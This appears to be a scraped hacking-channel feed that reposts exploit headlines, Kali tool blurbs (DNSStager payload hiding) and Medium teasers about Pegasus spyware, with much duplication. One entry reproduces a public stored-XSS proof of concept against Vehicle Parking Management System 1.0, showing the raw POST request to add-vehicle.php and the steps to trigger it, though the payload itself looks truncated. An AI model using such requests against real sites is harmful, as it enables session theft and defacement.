Exploit Collector
Vehicle Parking Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Vehicle Parking Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Vehicle Parking Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Sequoia: A Deep Root In Linux's Filesystem Layer
___________________________
@hacking_Attack
@Hacking_Video
Sequoia: A Deep Root In Linux's Filesystem Layer
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Sequoia: A Deep Root In Linux's Filesystem Layer
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Vehicle Parking Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Vehicle Parking Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.
MD5 |
ac9f28e3fc856df19b30c3f0ff99cfb6Download
# Exploit Title: Vehicle Parking Management System - Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP
################
# Description #
################
# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.
########
# PoC #
########
PoC ) param vehcomp,vehreno,ownername - Stored XSS
Payload: 1;
Request:
========
POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"
Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"
1;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"
2;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"
3;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"
7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"
-----------------------------39455081863880051020862918006--
############
# Fire up #
############
1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Vehicle Parking Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Wordpress Backup Guard Authenticated Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Wordpress Backup Guard Authenticated Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Wordpress Backup Guard Authenticated Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Sage X3 Administration Service Authentication Bypass / Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Sage X3 Administration Service Authentication Bypass / Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Sage X3 Administration Service Authentication Bypass / Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
DNSStager : Hide Your Payload In DNS
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as AAAA or TXT records after splitting it into chunks and encoding the payload using different […]
The post DNSStager : Hide Your Payload In DNS appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
DNSStager : Hide Your Payload In DNS
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as AAAA or TXT records after splitting it into chunks and encoding the payload using different […]
The post DNSStager : Hide Your Payload In DNS appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
DNSStager : Hide Your Payload In DNS !!! Kali Linux
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Resolvendo Bounty Hacker THM(PT-BR)
https://cdn-images-1.medium.com/max/1298/1*l_La9RtzUK4a3sBGMBiPSg.png
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Resolvendo Bounty Hacker THM(PT-BR)
https://cdn-images-1.medium.com/max/1298/1*l_La9RtzUK4a3sBGMBiPSg.png
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Resolvendo Bounty Hacker THM(PT-BR)
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pegasus Spyware. Everything you need to know
https://cdn-images-1.medium.com/max/1000/0*GROVzVbNKrbdJtQ2
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Pegasus Spyware. Everything you need to know
https://cdn-images-1.medium.com/max/1000/0*GROVzVbNKrbdJtQ2
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pegasus Spyware. Everything you need to know
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Takeaways From the Mighty Pegasus — the NSO Group Spyware
https://cdn-images-1.medium.com/max/2600/1*x-akcj_ZIn12OWU7l3sIjA.jpeg
Even iPhone Security is No Match for NSO Group Spyware.
Continue reading on Technology Hits »
___________________________
@hacking_Attack
@Hacking_Video
Takeaways From the Mighty Pegasus — the NSO Group Spyware
https://cdn-images-1.medium.com/max/2600/1*x-akcj_ZIn12OWU7l3sIjA.jpeg
Even iPhone Security is No Match for NSO Group Spyware.
Continue reading on Technology Hits »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Takeaways From the Mighty Pegasus — the NSO Group Spyware
Even iPhone Security is No Match for NSO Group Spyware.